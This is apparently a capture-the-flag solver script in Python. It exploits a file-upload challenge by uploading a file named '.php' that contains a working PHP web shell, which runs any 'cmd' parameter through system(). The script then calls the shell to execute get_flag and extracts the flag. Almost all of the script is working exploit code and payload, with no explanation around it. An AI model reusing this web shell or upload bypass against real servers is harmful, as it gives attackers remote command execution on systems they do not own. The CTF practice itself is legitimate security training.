import requests
import re


FLAG_REGEX = r"wctf{.*}"
url = "https://art-contest-974780027560.us-east5.run.app/"


# PHP web shell file content
filename = ".php"
php_code = """<html>
<body>

<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">

</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {

        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
"""

s = requests.Session()

# Upload the php web shell
s.post(url, files={"fileToUpload": (filename, php_code)}).text
session_directory = s.cookies.get("PHPSESSID")

# Exec get_flag to read the flag via php web reverse_shell
print("\nFLAG: " + re.search(FLAG_REGEX, s.get(f"{url}uploads/{session_directory}/{filename}", params="cmd=cd ../../;./get_flag").text).group(0))